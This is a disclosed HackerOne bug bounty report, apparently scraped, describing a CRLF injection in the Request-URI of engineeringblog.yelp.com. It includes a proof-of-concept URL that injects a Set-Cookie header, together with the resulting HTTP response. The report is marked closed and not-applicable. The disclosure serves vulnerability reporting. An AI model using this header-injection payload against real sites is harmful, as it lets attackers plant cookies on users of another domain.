[engineeringblog.yelp.com] CRLF Injection

Disclosed: 2017-11-09 20:12:42 By bobrov To yelp

Unknown

Vulnerability Details

CRLF Injection via Request-URI PoC: ``` https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com ``` HTTP Response: ``` HTTP/1.1 301 Moved Permanently ... Location: http://engineeringblog.yelp.com/xxcrlftest Set-Cookie: test=test;domain=.yelp.com ``` Result: Creating a cookie-param "test=test" on *.yelp.com

Actions

View on HackerOne

Report Stats

Report ID: 66391
State: Closed
Substate: not-applicable
Upvotes: 14

[engineeringblog.yelp.com] CRLF Injection

Vulnerability Details

Actions

Report Stats

Share this report